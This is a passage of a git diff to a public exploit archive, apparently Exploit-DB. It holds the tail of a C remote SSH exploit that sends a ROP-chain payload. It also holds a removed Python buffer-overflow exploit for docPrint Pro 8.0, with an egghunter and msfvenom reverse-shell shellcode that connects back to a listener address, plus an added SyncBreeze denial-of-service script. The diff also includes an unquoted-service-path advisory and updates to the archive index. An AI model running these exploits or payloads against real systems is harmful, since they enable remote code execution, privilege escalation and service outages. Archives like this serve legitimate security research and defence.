+							retaddr = malloc(strlen(targets[rc].ropchain)+1);
+							if(retaddr){
+								memset(retaddr,0,strlen(targets[rc].ropchain)+1);
+								memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
+								itarg = rc;
+							}
+							break;
+						case 4:
+							printf("[-] chosen target '%s'\n",targets[rc].name);
+							retaddr = malloc(strlen(targets[rc].ropchain)+1);
+							if(retaddr){
+								memset(retaddr,0,strlen(targets[rc].ropchain)+1);
+								memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
+								itarg = rc;
+							}
+							break;
+						default:
+							printf("[!] Invalid target selection %d\n", rc);
+							exit(0);
+							break;
+					}
+					itarg = 1;
+				}
+        	                break;
+			case 'h':
+				printf("[!] Usage instructions.\n[\n");
+				printf("[ %s <required> (optional)\n[\n[   --server|-s <ip/hostname>\n",argv[0]);
+				printf("[   --port|-p (port)[default 22]\n[   --target|-t <target#>\n");
+				printf("[   --shellcode|-x <shellcode#>\n[\n");
+				printf("[ Target#'s\n");
+				for(i = 0;i <= targetno - 1;i++){
+					printf("[ %d \"%s\"\n",i,targets[i]);
+				}
+				printf("[\n[ Shellcode#'s\n");
+				for(i = 0;i <= shellno - 1;i++){
+					printf("[ %d \"%s\" (length %d bytes)\n",i,shellcodes[i].name,strlen(shellcodes[i].shellcode));
+				}
+				printf("\e[0m");
+				exit(0);
+				break;
+			default:
+                		break;
+	        }
+	}
+	if(itarg != 1 || ihost  != 1 || ishell < 0){
+		printf("[!] error, insufficient arguments, try running '%s --help'\e[0m\n",argv[0]);
+		exit(-1);
+	}
+	rc = libssh2_init(0);
+	hostaddr = inet_addr(host);
+	sd = socket(AF_INET, SOCK_STREAM, 0);
+	sain.sin_family = AF_INET;
+	sain.sin_port = htons(port);
+	sain.sin_addr.s_addr = hostaddr;
+	if(connect(sd, (struct sockaddr*)(&sain),sizeof(struct sockaddr_in)) != 0) {
+		fprintf(stderr, "[!] failed to connect!\n");
+		goto shutdown;
+	}
+	session = libssh2_session_init();
+	libssh2_session_set_blocking(session, 1);
+	while((rc = libssh2_session_handshake(session, sd))==LIBSSH2_ERROR_EAGAIN);
+	if(rc) {
+		printf("[!] failure establishing ssh session: %d\n", rc);
+		goto shutdown;
+	}
+	nh = libssh2_knownhost_init(session);
+	if(!nh) {
+		printf("[!] failure on libssh2 init\n");
+		goto shutdown;
+	}
+	fingerprint = libssh2_hostkey_hash(session, LIBSSH2_HOSTKEY_HASH_SHA1);
+	printf("[+] ssh host fingerprint: ");
+	for(i = 0; i < 20; i++) {
+		printf("%02x", (unsigned char)fingerprint[i]);
+	}
+	printf("\n");
+	libssh2_knownhost_free(nh);
+	signal(SIGINT,&on_interrupt);
+	libssh2_userauth_keyboard_interactive(session, "", &kbd_callback);
+	printf("[!] exploit failed, core maybe on target!\n");
+shutdown:
+	if(sd){
+		close(sd);
+	}
+	printf("\e[0m");
+	return -2;
+}
\ No newline at end of file
diff --git a/exploits/windows/local/48719.py b/exploits/windows/local/48719.py
deleted file mode 100755
index acf6c7333..000000000
--- a/exploits/windows/local/48719.py
+++ /dev/null
@@ -1,99 +0,0 @@
-# Exploit Title: docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)
-# Date: 2020-07-26
-# Exploit Author: MasterVlad
-# Vendor Homepage: http://www.verypdf.com
-# Software Link: http://dl.verypdf.net/docprint_pro_setup.exe
-# Version: 8.0
-# Vulnerability Type: Local Buffer Overflow
-# Tested on: Windows 7 32-bit
-
-# Proof of Concept:
-
-# 1. Run the python script
-# 2. Open exploit.txt and copy the content to clipboard
-# 3. Open doc2pdf_win.exe and go to File -> Add URL
-# 4. Paste the clipboard into the field and click on Ok
-
-#!/usr/bin/python
-
-# encoded egghunter
-egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x44\x17\x50\x5c\x25\x4A"
-egg += "\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50"
-egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50"
-egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50"
-egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50"
-egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50"
-egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50"
-egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50"
-egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50"
-
-# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x13\x14\x15\x16" -f py -e x86/alpha_mixed BufferRegister=EDI
-
-buf =  ""
-buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
-buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
-buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
-buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
-buf += "\x69\x6c\x68\x68\x6e\x62\x55\x50\x45\x50\x43\x30\x63"
-buf += "\x50\x6e\x69\x6a\x45\x45\x61\x59\x50\x55\x34\x4e\x6b"
-buf += "\x52\x70\x76\x50\x6c\x4b\x73\x62\x76\x6c\x6c\x4b\x70"
-buf += "\x52\x42\x34\x6e\x6b\x43\x42\x75\x78\x64\x4f\x48\x37"
-buf += "\x42\x6a\x71\x36\x65\x61\x39\x6f\x6e\x4c\x67\x4c\x53"
-buf += "\x51\x71\x6c\x76\x62\x56\x4c\x67\x50\x79\x51\x78\x4f"
-buf += "\x36\x6d\x43\x31\x79\x57\x6d\x32\x4c\x32\x72\x72\x66"
-buf += "\x37\x6e\x6b\x72\x72\x56\x70\x6e\x6b\x32\x6a\x75\x6c"
-buf += "\x4e\x6b\x62\x6c\x37\x61\x33\x48\x69\x73\x43\x78\x56"
-buf += "\x61\x38\x51\x50\x51\x4e\x6b\x71\x49\x31\x30\x57\x71"
-buf += "\x4b\x63\x6e\x6b\x71\x59\x37\x68\x68\x63\x57\x4a\x50"
-buf += "\x49\x6e\x6b\x75\x64\x4e\x6b\x43\x31\x68\x56\x35\x61"
-buf += "\x59\x6f\x6e\x4c\x69\x51\x48\x4f\x36\x6d\x55\x51\x6f"
-buf += "\x37\x65\x68\x4b\x50\x70\x75\x69\x66\x73\x33\x51\x6d"
-buf += "\x6a\x58\x35\x6b\x63\x4d\x76\x44\x54\x35\x4d\x34\x43"
-buf += "\x68\x4e\x6b\x70\x58\x37\x54\x76\x61\x59\x43\x62\x46"
-buf += "\x6c\x4b\x54\x4c\x72\x6b\x6e\x6b\x51\x48\x35\x4c\x35"
-buf += "\x51\x79\x43\x6c\x4b\x43\x34\x6c\x4b\x63\x31\x68\x50"
-buf += "\x6d\x59\x57\x34\x76\x44\x67\x54\x31\x4b\x51\x4b\x33"
-buf += "\x51\x71\x49\x72\x7a\x50\x51\x79\x6f\x69\x70\x43\x6f"
-buf += "\x63\x6f\x33\x6a\x6e\x6b\x65\x42\x48\x6b\x6c\x4d\x31"
-buf += "\x4d\x50\x68\x45\x63\x55\x62\x73\x30\x75\x50\x30\x68"
-buf += "\x44\x37\x73\x43\x45\x62\x43\x6f\x43\x64\x45\x38\x42"
-buf += "\x6c\x53\x47\x46\x46\x63\x37\x69\x6f\x69\x45\x48\x38"
-buf += "\x4a\x30\x45\x51\x57\x70\x55\x50\x67\x59\x49\x54\x70"
-buf += "\x54\x32\x70\x42\x48\x44\x69\x6d\x50\x70\x6b\x67\x70"
-buf += "\x79\x6f\x6b\x65\x66\x30\x30\x50\x70\x50\x32\x70\x43"
-buf += "\x70\x72\x70\x67\x30\x62\x70\x75\x38\x58\x6a\x36\x6f"
-buf += "\x49\x4f\x79\x70\x69\x6f\x48\x55\x4c\x57\x53\x5a\x56"
-buf += "\x65\x52\x48\x79\x50\x79\x38\x4f\x54\x6d\x51\x52\x48"
-buf += "\x43\x32\x53\x30\x63\x31\x4d\x6b\x6d\x59\x38\x66\x30"
-buf += "\x6a\x66\x70\x43\x66\x53\x67\x61\x78\x5a\x39\x6e\x45"
-buf += "\x72\x54\x33\x51\x59\x6f\x58\x55\x4b\x35\x59\x50\x44"
-buf += "\x34\x66\x6c\x69\x6f\x32\x6e\x65\x58\x31\x65\x4a\x4c"
-buf += "\x50\x68\x6a\x50\x68\x35\x39\x32\x73\x66\x49\x6f\x58"
-buf += "\x55\x62\x48\x42\x43\x32\x4d\x73\x54\x57\x70\x6b\x39"
-buf += "\x39\x73\x66\x37\x76\x37\x42\x77\x55\x61\x49\x66\x50"
-buf += "\x6a\x54\x52\x73\x69\x70\x56\x78\x62\x49\x6d\x32\x46"
-buf += "\x49\x57\x57\x34\x51\x34\x65\x6c\x53\x31\x65\x51\x4c"
-buf += "\x4d\x52\x64\x61\x34\x32\x30\x6b\x76\x47\x70\x72\x64"
-buf += "\x51\x44\x42\x70\x42\x76\x46\x36\x43\x66\x77\x36\x42"
-buf += "\x76\x62\x6e\x32\x76\x71\x46\x70\x53\x46\x36\x33\x58"
-buf += "\x61\x69\x58\x4c\x35\x6f\x6b\x36\x6b\x4f\x4b\x65\x4d"
-buf += "\x59\x49\x70\x30\x4e\x31\x46\x33\x76\x6b\x4f\x66\x50"
-buf += "\x71\x78\x43\x38\x4b\x37\x37\x6d\x73\x50\x6b\x4f\x4b"
-buf += "\x65\x6f\x4b\x48\x70\x6c\x75\x4f\x52\x72\x76\x73\x58"
-buf += "\x49\x36\x6e\x75\x4d\x6d\x4d\x4d\x59\x6f\x39\x45\x55"
-buf += "\x6c\x63\x36\x53\x4c\x66\x6a\x4d\x50\x79\x6b\x6b\x50"
-buf += "\x64\x35\x46\x65\x6f\x4b\x72\x67\x45\x43\x50\x72\x70"
-buf += "\x6f\x32\x4a\x65\x50\x51\x43\x49\x6f\x59\x45\x41\x41"
-
-exploit = "A"*3876
-exploit += "\x74\x06\x75\x04"
-# 0x1001062d - pop pop ret - reg.dll
-exploit += "\x2d\x06\x01\x10"
-exploit += egg
-exploit += "D"*(10000-3884-len(egg)-len(buf)-8)
-exploit += "T00WT00W"
-exploit += buf
-
-f = open("exploit.txt", "w")
-f.write(exploit)
-f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/49248.txt b/exploits/windows/local/49248.txt
new file mode 100644
index 000000000..3b3f8ec5f
--- /dev/null
+++ b/exploits/windows/local/49248.txt
@@ -0,0 +1,29 @@
+# Exploit Title: System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path
+# Date: 2020-10-14
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: http://systemexplorer.net/
+# Software Link:  http://systemexplorer.net/download/SystemExplorerSetup.exe
+# Version: Version 7.0.0
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+# Service info:
+
+C:\Users\m507>sc qc SystemExplorerHelpService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: SystemExplorerHelpService
+        TYPE               : 20  WIN32_SHARE_PROCESS
+        START_TYPE         : 3   DEMAND_START
+        ERROR_CONTROL      : 0   IGNORE
+        BINARY_PATH_NAME   : C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : System Explorer Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users\m507>
+
+
+# Exploit:
+This vulnerability could permit executing code during startup or reboot with the escalated privileges.
\ No newline at end of file
diff --git a/exploits/windows/webapps/49291.py b/exploits/windows/webapps/49291.py
new file mode 100755
index 000000000..89aa8b74c
--- /dev/null
+++ b/exploits/windows/webapps/49291.py
@@ -0,0 +1,33 @@
+# Exploit Title: SyncBreeze 10.0.28 - 'login' Denial of Service (Poc)
+# Data: 18-Dec-2020
+# Exploit Author: Ahmed Elkhressy
+# Vendor Homepage: http://www.syncbreeze.com
+# Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe
+# Version: 10.0.28
+# Tested on: Windows 7, Windows 10
+
+#!/usr/bin/python
+import socket
+
+host="192.168.1.9"
+payload = 'A' *1000
+request = ""
+request += "POST /login HTTP/1.1\r\n"
+request += "Host: "+host+"\r\n"
+request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\r\n"
+request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
+request += "Accept-Language: en-US,en;q=0.5\r\n"
+request += "Accept-Encoding: gzip, deflate\r\n"
+request += "Content-Type: application/x-www-form-urlencoded\r\n"
+request += "Content-Length: 27\r\n"
+request += "Origin: http://"+host+"\r\n"
+request += "Connection: keep-alive\r\n"
+request += "Referer: http://"+host+"/login"+payload+"\r\n"
+request += "Upgrade-Insecure-Requests: 1\r\n"
+request += "\r\n"
+request += "username=test&password=test"
+s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((host, 80))
+s.send(request)
+print s.recv(1024)
+s.close
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 68282e8af..5a2671797 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6765,6 +6765,7 @@ id,file,description,date,author,type,platform,port
 49119,exploits/linux/dos/49119.py,"libupnp 1.6.18 - Stack-based buffer overflow (DoS)",2020-11-27,"Patrik Lantz",dos,linux,
 49206,exploits/windows/dos/49206.txt,"TapinRadio 2.13.7 - Denial of Service (PoC)",2020-12-07,"Ismael Nava",dos,windows,
 49207,exploits/windows/dos/49207.txt,"RarmaRadio 2.72.5 - Denial of Service (PoC)",2020-12-07,"Ismael Nava",dos,windows,
+49283,exploits/multiple/dos/49283.txt,"Nxlog Community Edition 2.10.2150 - DoS (Poc)",2020-12-17,"Guillaume PETIT",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -11198,7 +11199,6 @@ id,file,description,date,author,type,platform,port
 48691,exploits/windows/local/48691.py,"Socusoft Photo to Video Converter Professional 8.07 - 'Output Folder' Buffer Overflow (SEH Egghunter)",2020-07-26,MasterVlad,local,windows,
 48695,exploits/windows/local/48695.py,"Port Forwarding Wizard 4.8.0 - Buffer Overflow (SEH)",2020-07-26,"Sarang Tumne",local,windows,
 48696,exploits/windows/local/48696.py,"Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter)",2020-07-26,"Eduard Palisek",local,windows,
-48719,exploits/windows/local/48719.py,"docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)",2020-07-26,MasterVlad,local,windows,
 48735,exploits/windows/local/48735.txt,"CodeMeter 6.60 - 'CodeMeter.exe' Unquoted Service Path",2020-08-06,"Luis Martínez",local,windows,
 48740,exploits/windows/local/48740.txt,"BarcodeOCR 19.3.6 - 'BarcodeOCR' Unquoted Service Path",2020-08-10,"Daniel Bertoni",local,windows,
 48769,exploits/windows/local/48769.py,"ASX to MP3 converter 3.1.3.7.2010.11.05 - '.wax' Local Buffer Overflow (DEP_ASLR Bypass) (PoC)",2020-08-27,"Paras Bhatia",local,windows,
@@ -11228,8 +11228,10 @@ id,file,description,date,author,type,platform,port
 49203,exploits/windows/local/49203.txt,"Rumble Mail Server 0.51.3135 - 'rumble_win32.exe' Unquoted Service Path",2020-12-07,"Mohammed Alshehri",local,windows,
 49205,exploits/windows/local/49205.txt,"Kite 1.2020.1119.0 - 'KiteService' Unquoted Service Path",2020-12-07,"Ismael Nava",local,windows,
 49211,exploits/windows/local/49211.ps1,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)",2020-12-07,1F98D,local,windows,
-49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Thomas Sluyter",local,multiple,
+49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Tess Sluyter",local,multiple,
 49226,exploits/windows/local/49226.txt,"PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path",2020-12-10,"Zaira Alquicira",local,windows,
+49248,exploits/windows/local/49248.txt,"System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path",2020-12-14,"Mohammed Alshehri",local,windows,
+49259,exploits/linux/local/49259.c,"libbabl 0.1.62 - Broken Double Free Detection (PoC)",2020-12-15,"Carter Yagemann",local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17974,7 +17976,7 @@ id,file,description,date,author,type,platform,port
 44294,exploits/windows/remote/44294.html,"Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution",2018-03-16,Rh0,remote,windows,
 44297,exploits/linux/remote/44297.py,"Unitrends UEB 10.0 - Root Remote Code Execution",2018-03-16,"Jared Arave",remote,linux,
 44345,exploits/windows/remote/44345.txt,"Acrolinx Server < 5.2.5 - Directory Traversal",2018-03-26,"Berk Dusunur",remote,windows,
-44349,exploits/linux/remote/44349.md,"TestLink Open Source Test Management < 1.9.16 - Remote Code Execution (PoC)",2018-03-27,"Manish Tanwar",remote,linux,
+49293,exploits/hardware/remote/49293.txt,"FRITZ!Box 7.20 - DNS Rebinding Protection Bypass",2020-12-18,"RedTeam Pentesting GmbH",remote,hardware,
 44356,exploits/windows/remote/44356.rb,"GitStack - Unsanitized Argument Remote Code Execution (Metasploit)",2018-03-29,Metasploit,remote,windows,
 44357,exploits/windows/remote/44357.rb,"Exodus Wallet (ElectronJS Framework) - Remote Code Execution (Metasploit)",2018-03-29,Metasploit,remote,windows,
 44376,exploits/windows/remote/44376.py,"Advantech WebAccess < 8.1 - webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow",2018-03-30,"Chris Lyne",remote,windows,4592
@@ -18339,6 +18341,7 @@ id,file,description,date,author,type,platform,port
 49216,exploits/windows/remote/49216.py,"SmarterMail Build 6985 - Remote Code Execution",2020-12-09,1F98D,remote,windows,
 49217,exploits/windows/remote/49217.py,"Dup Scout Enterprise 10.0.18 - 'sid' Remote Buffer Overflow (SEH)",2020-12-09,"Andrés Roldán",remote,windows,
 49218,exploits/windows/remote/49218.txt,"Huawei HedEx Lite 200R006C00SPC005 - Path Traversal",2020-12-09,Vulnerability-Lab,remote,windows,
+49261,exploits/solaris/remote/49261.c,"Solaris SunSSH 11.0 x86 - libpam Remote Root",2020-12-15,"Hacker Fantastic",remote,solaris,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -40314,7 +40317,7 @@ id,file,description,date,author,type,platform,port
 42090,exploits/multiple/webapps/42090.txt,"KEMP LoadMaster 7.135.0.13245 - Persistent Cross-Site Scripting / Remote Code Execution",2017-05-30,SecuriTeam,webapps,multiple,
 42091,exploits/windows/webapps/42091.txt,"IBM Informix Dynamic Server / Informix Open Admin Tool - DLL Injection / Remote Code Execution / Heap Buffer Overflow",2017-05-30,SecuriTeam,webapps,windows,
 41849,exploits/php/webapps/41849.txt,"Jobscript4Web 4.5 - Authentication Bypass",2017-04-08,TurkCyberArmy,webapps,php,
-41855,exploits/xml/webapps/41855.sh,"Adobe (Multiple Products) - XML Injection File Content Disclosure",2017-04-07,"Thomas Sluyter",webapps,xml,8400
+41855,exploits/xml/webapps/41855.sh,"Adobe (Multiple Products) - XML Injection File Content Disclosure",2017-04-07,"Tess Sluyter",webapps,xml,8400
 41856,exploits/php/webapps/41856.txt,"MyClassifiedScript 5.1 - SQL Injection",2017-04-11,"Ihsan Sencan",webapps,php,
 41858,exploits/php/webapps/41858.txt,"Social Directory Script 2.0 - SQL Injection",2017-04-11,"Ihsan Sencan",webapps,php,
 41859,exploits/php/webapps/41859.txt,"FAQ Script 3.1.3 - 'category_id' SQL Injection",2017-04-11,"Ihsan Sencan",webapps,php,
@@ -41216,6 +41219,8 @@ id,file,description,date,author,type,platform,port
 44339,exploits/php/webapps/44339.txt,"MyBB Plugin Last User's Threads in Profile Plugin 1.2 - Persistent Cross-Site Scripting",2018-03-23,0xB9,webapps,php,
 44340,exploits/php/webapps/44340.txt,"WordPress Plugin Site Editor 1.1.1 - Local File Inclusion",2018-03-23,"Nicolas Buzy-Debat",webapps,php,80
 44343,exploits/php/webapps/44343.py,"Laravel Log Viewer < 0.13.0 - Local File Download",2018-03-26,"Haboob Team",webapps,php,
+49291,exploits/windows/webapps/49291.py,"SyncBreeze 10.0.28 - 'login' Denial of Service (Poc)",2020-12-18,"Ahmed Elkhressy",webapps,windows,
+49292,exploits/php/webapps/49292.txt,"Xeroneit Library Management System 3.1 - _Add Book Category _ Stored XSS",2020-12-18,"Kislay Kumar",webapps,php,
 44350,exploits/multiple/webapps/44350.py,"TwonkyMedia Server 7.0.11-8.5 - Directory Traversal",2018-03-28,"Sven Fassbender",webapps,multiple,
 44351,exploits/multiple/webapps/44351.txt,"TwonkyMedia Server 7.0.11-8.5 - Persistent Cross-Site Scripting",2018-03-28,"Sven Fassbender",webapps,multiple,
 44352,exploits/windows/webapps/44352.txt,"Microsoft Windows Remote Assistance - XML External Entity Injection",2018-03-28,"Nabeel Ahmed",webapps,windows,
@@ -43463,3 +43468,44 @@ id,file,description,date,author,type,platform,port
 49241,exploits/php/webapps/49241.txt,"Courier Management System 1.0 - 'First Name' Stored XSS",2020-12-11,Zhaiyi,webapps,php,
 49242,exploits/php/webapps/49242.txt,"Courier Management System 1.0 - 'MULTIPART street ((custom) ' SQL Injection",2020-12-11,Zhaiyi,webapps,php,
 49243,exploits/php/webapps/49243.txt,"Courier Management System 1.0 - 'ref_no' SQL Injection",2020-12-11,Zhaiyi,webapps,php,
+49245,exploits/php/webapps/49245.txt,"Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change password)",2020-12-14,KeopssGroup0day_Inc,webapps,php,
+49246,exploits/multiple/webapps/49246.py,"LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection",2020-12-14,Hodorsec,webapps,multiple,
+49247,exploits/multiple/webapps/49247.py,"MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC)",2020-12-14,securityforeveryone.com,webapps,multiple,
+49249,exploits/multiple/webapps/49249.txt,"Seacms 11.1 - 'ip and weburl' Remote Command Execution",2020-12-14,j5s,webapps,multiple,
+49250,exploits/multiple/webapps/49250.txt,"Seacms 11.1 - 'file' Local File Inclusion",2020-12-14,j5s,webapps,multiple,
+49251,exploits/multiple/webapps/49251.txt,"Seacms 11.1 - 'checkuser' Stored XSS",2020-12-14,j5s,webapps,multiple,
+49252,exploits/multiple/webapps/49252.txt,"WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download",2020-12-14,Wadeek,webapps,multiple,
+49253,exploits/multiple/webapps/49253.txt,"Rumble Mail Server 0.51.3135 - 'servername' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
+49254,exploits/multiple/webapps/49254.txt,"Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
+49255,exploits/multiple/webapps/49255.txt,"Rumble Mail Server 0.51.3135 - 'username' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
+49256,exploits/hardware/webapps/49256.py,"Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation",2020-12-14,"Maximilian Barz",webapps,hardware,
+49257,exploits/ruby/webapps/49257.py,"Gitlab 11.4.7 - Remote Code Execution",2020-12-14,"Fortunato Lodari",webapps,ruby,
+49258,exploits/php/webapps/49258.txt,"Task Management System 1.0 - 'page' Local File Inclusion",2020-12-15,"İsmail BOZKURT",webapps,php,
+49260,exploits/php/webapps/49260.py,"Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)",2020-12-15,"Andrea Bruschi",webapps,php,
+49262,exploits/hardware/webapps/49262.py,"Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)",2020-12-15,Freakyclown,webapps,hardware,
+49263,exploits/ruby/webapps/49263.py,"GitLab 11.4.7 - Remote Code Execution (Authenticated)",2020-12-16,"Mohin Paramasivam",webapps,ruby,
+49264,exploits/php/webapps/49264.txt,"Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting",2020-12-16,"Sagar Banwa",webapps,php,
+49265,exploits/linux/webapps/49265.txt,"Raysync 3.3.3.8 - RCE",2020-12-16,james,webapps,linux,
+49266,exploits/android/webapps/49266.py,"Magic Home Pro 1.5.1 - Authentication Bypass",2020-12-16,"Victor Hanna",webapps,android,
+49267,exploits/php/webapps/49267.txt,"PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection",2020-12-16,"Frederic ADAM",webapps,php,
+49268,exploits/php/webapps/49268.txt,"Seotoaster 3.2.0 - Stored XSS on Edit page properties",2020-12-16,"Hardik Solanki",webapps,php,
+49269,exploits/php/webapps/49269.py,"Dolibarr ERP-CRM 12.0.3 - Remote Code Execution (Authenticated)",2020-12-17,"Yilmaz Degirmenci",webapps,php,
+49270,exploits/hardware/webapps/49270.py,"Linksys RE6500 1.0.11.001 - Unauthenticated RCE",2020-12-17,RE-Solver,webapps,hardware,
+49271,exploits/php/webapps/49271.txt,"Content Management System 1.0 - 'First Name' Stored XSS",2020-12-17,Zhaiyi,webapps,php,
+49272,exploits/php/webapps/49272.txt,"Content Management System 1.0 - 'email' SQL Injection",2020-12-17,Zhaiyi,webapps,php,
+49273,exploits/php/webapps/49273.txt,"Content Management System 1.0 - 'id' SQL Injection",2020-12-17,Zhaiyi,webapps,php,
+49274,exploits/php/webapps/49274.txt,"Medical Center Portal Management System 1.0 - 'id' SQL Injection",2020-12-17,"Saeed Bala Ahmed",webapps,php,
+49275,exploits/php/webapps/49275.txt,"Customer Support System 1.0 - _First Name_ & _Last Name_ Stored XSS",2020-12-17,"Saeed Bala Ahmed",webapps,php,
+49276,exploits/php/webapps/49276.txt,"Customer Support System 1.0 - 'id' SQL Injection",2020-12-17,"Saeed Bala Ahmed",webapps,php,
+49277,exploits/php/webapps/49277.txt,"Online Tours & Travels Management System 1.0 - _id_ SQL Injection",2020-12-17,"Saeed Bala Ahmed",webapps,php,
+49278,exploits/php/webapps/49278.txt,"Interview Management System 1.0 - Stored XSS in Add New Question",2020-12-17,"Saeed Bala Ahmed",webapps,php,
+49279,exploits/php/webapps/49279.txt,"Interview Management System 1.0 - 'id' SQL Injection",2020-12-17,"Saeed Bala Ahmed",webapps,php,
+49280,exploits/php/webapps/49280.txt,"Employee Record System 1.0 - Multiple Stored XSS",2020-12-17,"Saeed Bala Ahmed",webapps,php,
+49281,exploits/php/webapps/49281.txt,"PHPJabbers Appointment Scheduler 2.3 - Reflected XSS (Cross-Site Scripting)",2020-12-17,"Andrea Intilangelo",webapps,php,
+49282,exploits/php/webapps/49282.txt,"Victor CMS 1.0 - Multiple SQL Injection (Authenticated)",2020-12-17,"Furkan Göksel",webapps,php,
+49284,exploits/php/webapps/49284.txt,"Point of Sale System 1.0 - Authentication Bypass",2020-12-18,"Saeed Bala Ahmed",webapps,php,
+49285,exploits/php/webapps/49285.txt,"Alumni Management System 1.0 - Unrestricted File Upload To RCE",2020-12-18,"Aakash Madaan",webapps,php,
+49286,exploits/php/webapps/49286.txt,"Alumni Management System 1.0 - _Course Form_ Stored XSS",2020-12-18,"Aakash Madaan",webapps,php,
+49287,exploits/php/webapps/49287.txt,"Alumni Management System 1.0 - 'id' SQL Injection",2020-12-18,"Aakash Madaan",webapps,php,
+49288,exploits/php/webapps/49288.rb,"Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read (Metasploit)",2020-12-18,"SunCSR Team",webapps,php,
+49290,exploits/php/webapps/49290.txt,"Smart Hospital 3.1 - _Add Patient_ Stored XSS",2020-12-18,"Kislay Kumar",webapps,php,
